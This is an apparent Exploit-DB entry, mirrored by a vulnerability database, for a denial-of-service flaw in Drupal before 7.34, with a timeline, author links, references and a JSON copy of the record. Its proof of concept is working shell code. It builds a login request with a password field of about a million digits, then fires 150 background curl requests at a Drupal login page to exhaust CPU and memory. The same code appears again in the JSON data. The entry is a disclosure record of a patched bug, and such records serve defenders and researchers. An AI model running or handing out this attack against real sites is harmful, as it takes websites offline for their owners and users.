Search...

Drupal < 7.34 - Denial of Service

2014-12-01T00:00:00

ID EDB-ID:35415
Type exploitdb
Reporter Javer Nieto & Andres Rojas
Modified 2014-12-01T00:00:00

Description

                                        
                                            ====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Drupal &lt; 7.34 allows an attacker to send
specially crafted requests resulting in CPU and memory exhaustion. This
may lead to the site becoming unavailable or unresponsive (denial of
service).

====================================================================
Time Line:
====================================================================

November 19, 2014 - A Drupal security update and the security advisory
is published.

====================================================================
Proof of Concept:
====================================================================

Generate a pyaload and try with a valid user:

echo -n "name=admin&pass=" &gt; valid_user_payload && printf "%s"
{1..1000000} &gt;&gt; valid_user_payload && echo -n "&op=Log
in&form_id=user_login" &gt;&gt; valid_user_payload

Perform a Dos with a valid user:

for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/drupal/?q=user --silent &gt; /dev/null &); sleep 0.5; done


====================================================================
Authors:
====================================================================

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info

====================================================================
References:
====================================================================

* https://wordpress.org/news/2014/11/wordpress-4-0-1/

* https://www.drupal.org/SA-CORE-2014-006

*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html

*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html

* http://www.devconsole.info/?p=1050

JSON Vulners Source

Initial Source

{"id": "EDB-ID:35415", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Drupal < 7.34 - Denial of Service", "description": "", "published": "2014-12-01T00:00:00", "modified": "2014-12-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/35415", "reporter": "Javer Nieto & Andres Rojas", "references": [], "cvelist": ["2014-9016"], "immutableFields": [], "lastseen": "2022-01-13T05:58:45", "viewCount": 15, "enchantments": {"dependencies": {}, "score": {"value": -0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://www.exploit-db.com/download/35415", "sourceData": "====================================================================\r\nDESCRIPTION:\r\n====================================================================\r\nA vulnerability present in Drupal < 7.34 allows an attacker to send\r\nspecially crafted requests resulting in CPU and memory exhaustion. This\r\nmay lead to the site becoming unavailable or unresponsive (denial of\r\nservice).\r\n\r\n====================================================================\r\nTime Line:\r\n====================================================================\r\n\r\nNovember 19, 2014 - A Drupal security update and the security advisory\r\nis published.\r\n\r\n====================================================================\r\nProof of Concept:\r\n====================================================================\r\n\r\nGenerate a pyaload and try with a valid user:\r\n\r\necho -n \"name=admin&pass=\" > valid_user_payload && printf \"%s\"\r\n{1..1000000} >> valid_user_payload && echo -n \"&op=Log\r\nin&form_id=user_login\" >> valid_user_payload\r\n\r\nPerform a Dos with a valid user:\r\n\r\nfor i in `seq 1 150`; do (curl --data @valid_user_payload\r\nhttp://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done\r\n\r\n\r\n====================================================================\r\nAuthors:\r\n====================================================================\r\n\r\n-- Javer Nieto -- http://www.behindthefirewalls.com\r\n-- Andres Rojas -- http://www.devconsole.info\r\n\r\n====================================================================\r\nReferences:\r\n====================================================================\r\n\r\n* https://wordpress.org/news/2014/11/wordpress-4-0-1/\r\n\r\n* https://www.drupal.org/SA-CORE-2014-006\r\n\r\n*\r\nhttp://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html\r\n\r\n*\r\nhttp://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html\r\n\r\n* http://www.devconsole.info/?p=1050", "osvdbidlist": ["114870"], "exploitType": "dos", "verified": false, "_state": {"dependencies": 1645397961}}

Drupal &lt; 7.34 - Denial of Service

Description

Drupal < 7.34 - Denial of Service